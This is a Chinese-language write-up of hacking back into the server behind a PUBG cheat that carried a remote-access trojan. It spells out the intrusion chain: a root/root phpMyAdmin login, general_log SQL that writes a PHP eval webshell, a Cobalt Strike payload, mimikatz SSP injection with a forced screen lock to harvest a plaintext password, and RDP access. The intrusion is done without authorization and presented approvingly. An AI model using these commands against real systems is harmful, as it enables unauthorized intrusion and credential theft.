记一次对PUBG外挂病毒的反制过程
字数 1233 2025-08-25 22:58:47
PUBG外挂病毒反制过程深度分析
一、事件背景
该文档记录了对一款PUBG外挂软件("压枪神器")背后隐藏的远控病毒进行反制的完整过程。该外挂以USB加密狗形式销售,实际包含恶意软件,不仅提供游戏作弊功能,还将用户计算机作为肉鸡进行控制。
二、信息收集与分析
1. 初步检测
- 杀毒软件报警:运行外挂软件时杀毒软件报毒,发现远控程序
- 沙箱分析:使用微步沙箱检测软件行为,确认存在高危操作:
- 持久化行为
- 系统信息读取
- 远控特征
2. 服务器定位
- 从软件交互流量中发现HTTP协议IP地址
- 访问
http://10x.xx.xx.xx/1/1.txt确认服务器身份 - 使用dirmap工具进行目录扫描,发现phpMyAdmin等敏感路径
三、Web渗透
1. 数据库访问
- phpMyAdmin弱口令突破:root/root
- 确认环境:phpStudy搭建的web服务
2. WebShell获取
通过phpMyAdmin日志功能获取WebShell:
-- 开启日志功能
set global general_log='on';
-- 检查日志状态
show variables like "general_log%";
-- 设置日志输出路径(需结合phpinfo获取网站绝对路径)
set global general_log_file ="C:\phpStudy\PHPTutorial\WWW\info.php";
-- 写入一句话木马
select '<?php eval($_POST['tools']);?>';
- 使用中国菜刀连接WebShell
- 确认WebShell权限级别
四、权限提升
1. 系统权限获取
- 通过WebShell上传Cobalt Strike生成的payload(splww64.exe)
- 执行payload获取系统级控制
- Cobalt Strike成功上线
2. 密码获取尝试
- 使用mimikatz尝试抓取密码:
- 系统版本:Windows Server 2012 R2
- 安全限制:已修复内存获取密码漏洞
- IPC$远程认证方式改变
- 仅能获取NTLM hash,难以破解
3. 巧取明文密码
使用mimikatz的SSP注入技术:
- 上传mimikatz.exe到目标系统
- 执行内存SSP注入:
C:/mimikazt.exe privilege::debug misc::memssp exit - 确认注入成功(Injected =)提示)
- 强制锁屏:
rundll32.exe user32.dll,LockWorkStation - 等待管理员重新登录
- 获取密码日志:
C:\Windows\System32\mimilsa.log
4. 远程桌面访问
- 使用nmap扫描RDP端口:
nmap -p 1-65355 10x.xx.xx.xx - 确认3389端口开放
- 使用获取的明文密码登录系统
五、技术要点总结
-
信息收集:
- 从可执行文件中提取交互IP/URL作为突破口
- 使用沙箱分析恶意软件行为
- 目录扫描发现敏感路径
-
Web渗透:
- 弱口令利用(root/root)
- phpMyAdmin日志导出获取WebShell技术
- 绝对路径获取方法
-
权限提升:
- WebShell到系统权限的转换
- 现代Windows系统密码获取技术
- mimikatz的SSP注入技术
- 强制锁屏技巧
-
防御建议:
- 禁用或修改默认端口
- 杜绝弱口令
- 定期检查系统异常进程
- 监控系统日志
六、安全启示
- 攻击链分析:一条root弱口令导致整个系统沦陷
- 外挂软件风险:不仅破坏游戏公平性,更可能成为黑客工具
- 安全意识:管理员应定期检查系统安全配置
- 应急响应:发现异常应及时断网排查
该案例展示了从外挂分析到完整系统控制的全过程,强调了基础安全配置的重要性,特别是弱口令和默认配置带来的巨大风险。